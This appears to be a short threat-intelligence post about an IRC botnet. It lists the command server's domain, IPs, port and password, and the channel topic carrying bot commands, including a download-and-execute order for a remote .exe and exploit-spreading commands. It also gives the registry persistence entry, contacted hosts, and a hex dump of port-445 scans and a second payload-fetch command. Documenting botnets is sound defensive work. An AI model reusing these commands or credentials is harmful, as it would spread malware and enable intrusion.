aaaa.forexinvest4.com(botnet hosted in Russian Federation Vline Ltd)

aaaa.forexinvest4.com ip: 109.196.130.66
aaaa.forexinvest4.com ip: 109.196.130.50
aaaa.forexinvest4.com:6939
PASS laorosr
Channel#dpi
Channel#!
NICK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is ‘.asc -S|.http http://walthamfinancial.com/xmob.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a’
Set by teaser57 on Tue Jan 11 08:24:00
Process
HKLM​SOFTWARE​Microsoft​Windows​CurrentVer.​policies​Explorer​Run​
Microsoft Driver Setup
C:WINDOWSggdrive32.exe

UPDATE:
Remote Host Port Number
112.78.112.208 80
218.85.133.201 80
216.104.45.90 7196

Remote Host Port Number
112.78.112.208 80
218.85.133.201 80
91.217.162.230 80
123.183.217.32 7196

00000000 | 5052 5256 4D53 4720 5B4E 3030 5F55 5341 | PRRVMSG [N00_USA
00000010 | 5F58 505F 3732 3337 BCB9 4020 3A20 5472 | _XP_7237..@ : Tr
00000020 | 7969 6E67 2074 6F20 6765 7420 6578 7465 | ying to get exte
00000030 | 726E 616C 2049 502E 0D0A 5052 5256 4D53 | rnal IP…PRRVMS
00000040 | 4720 5B4E 3030 5F55 5341 5F58 505F 3732 | G [N00_USA_XP_72
00000050 | 3337 BCB9 4020 3A20 5261 6E64 6F6D 2050 | 37..@ : Random P
00000060 | 6F72 7420 5363 616E 2073 7461 7274 6564 | ort Scan started
00000070 | 206F 6E20 3139 322E 782E 782E 783A 3434 | on 192.x.x.x:44
00000080 | 3520 7769 7468 2061 2064 656C 6179 206F | 5 with a delay o
00000090 | 6620 3520 7365 636F 6E64 7320 666F 7220 | f 5 seconds for
000000A0 | 3020 6D69 6E75 7465 7320 7573 696E 6720 | 0 minutes using
000000B0 | 3235 2074 6872 6561 6473 2E0D 0A50 5252 | 25 threads…PRR
000000C0 | 564D 5347 205B 4E30 305F 5553 415F 5850 | VMSG [N00_USA_XP
000000D0 | 5F37 3233 37BC B940 203A 2054 7279 696E | _7237..@ : Tryin
000000E0 | 6720 746F 2067 6574 2065 7874 6572 6E61 | g to get externa
000000F0 | 6C20 4950 2E0D 0A50 5252 564D 5347 205B | l IP…PRRVMSG [
00000100 | 4E30 305F 5553 415F 5850 5F37 3233 37BC | N00_USA_XP_7237.
00000110 | B940 203A 2052 616E 646F 6D20 506F 7274 | .@ : Random Port
00000120 | 2053 6361 6E20 7374 6172 7465 6420 6F6E | Scan started on
00000130 | 2031 3932 2E31 3638 2E78 2E78 3A34 3435 | 192.168.x.x:445
00000140 | 2077 6974 6820 6120 6465 6C61 7920 6F66 | with a delay of
00000150 | 2035 2073 6563 6F6E 6473 2066 6F72 2030 | 5 seconds for 0
00000160 | 206D 696E 7574 6573 2075 7369 6E67 2032 | minutes using 2
00000170 | 3520 7468 7265 6164 732E 0D0A 5052 5256 | 5 threads…PRRV
00000180 | 4D53 4720 5B4E 3030 5F55 5341 5F58 505F | MSG [N00_USA_XP_
00000190 | 3732 3337 BCB9 4020 3A20 5365 7175 656E | 7237..@ : Sequen
000001A0 | 7469 616C 2050 6F72 7420 5363 616E 2073 | tial Port Scan s
000001B0 | 7461 7274 6564 206F 6E20 3139 322E 3136 | tarted on 192.16
000001C0 | 382E 302E 303A 3434 3520 7769 7468 2061 | 8.0.0:445 with a
000001D0 | 2064 656C 6179 206F 6620 3520 7365 636F | delay of 5 seco
000001E0 | 6E64 7320 666F 7220 3020 6D69 6E75 7465 | nds for 0 minute
000001F0 | 7320 7573 696E 6720 3230 2074 6872 6561 | s using 20 threa
00000200 | 6473 2E0D 0A50 5252 564D 5347 205B 4E30 | ds…PRRVMSG [N0
00000210 | 305F 5553 415F 5850 5F37 3233 37BC B940 | 0_USA_XP_7237..@
00000220 | 203A 2053 6571 7565 6E74 6961 6C20 506F | : Sequential Po
00000230 | 7274 2053 6361 6E20 7374 6172 7465 6420 | rt Scan started
00000240 | 6F6E 2031 3932 2E31 3638 2E31 3837 2E30 | on 192.168.187.0
00000250 | 3A34 3435 2077 6974 6820 6120 6465 6C61 | :445 with a dela
00000260 | 7920 6F66 2035 2073 6563 6F6E 6473 2066 | y of 5 seconds f
00000270 | 6F72 2030 206D 696E 7574 6573 2075 7369 | or 0 minutes usi
00000280 | 6E67 2032 3020 7468 7265 6164 732E 0D0A | ng 20 threads…
00000290 | 5052 5256 4D53 4720 5B4E 3030 5F55 5341 | PRRVMSG [N00_USA
000002A0 | 5F58 505F 3732 3337 BCB9 4020 3A20 5365 | _XP_7237..@ : Se
000002B0 | 7175 656E 7469 616C 2050 6F72 7420 5363 | quential Port Sc
000002C0 | 616E 2073 7461 7274 6564 206F 6E20 3139 | an started on 19
000002D0 | 322E 302E 302E 303A 3434 3520 7769 7468 | 2.0.0.0:445 with
000002E0 | 2061 2064 656C 6179 206F 6620 3520 7365 | a delay of 5 se
000002F0 | 636F 6E64 7320 666F 7220 3020 6D69 6E75 | conds for 0 minu
00000300 | 7465 7320 7573 696E 6720 3130 2074 6872 | tes using 10 thr
00000310 | 6561 6473 2E0D 0A50 4153 5320 6C61 6F72 | eads…PASS laor
00000320 | 6F73 720D 0A4B 4349 4B20 5B4E 3030 5F55 | osr..KCIK [N00_U
00000330 | 5341 5F58 505F 3732 3337 3630 365D 18E7 | SA_XP_7237606]..
00000340 | 400D 0A72 7373 7220 5350 322D 3434 3120 | @..rssr SP2-441
00000350 | 2A20 3020 3A43 4F4D 5055 5445 524E 414D | * 0 :COMPUTERNAM
00000360 | 450D 0A73 656E 6420 2321 2C23 4D61 206F | E..send #!,#Ma o
00000370 | 6F6F 6F0D 0A50 5252 564D 5347 2023 6920 | ooo..PRRVMSG #i
00000380 | 3A48 5454 5020 5345 5420 6874 7470 3A2F | :HTTP SET http:/
00000390 | 2F39 312E 3231 372E 3136 322E 3130 342F | /91.217.162.104/
000003A0 | 6D30 622E 6578 650D 0A | m0b.exe..

infos about hosting:
http://whois.domaintools.com/109.196.130.50

Categories: Uncategorized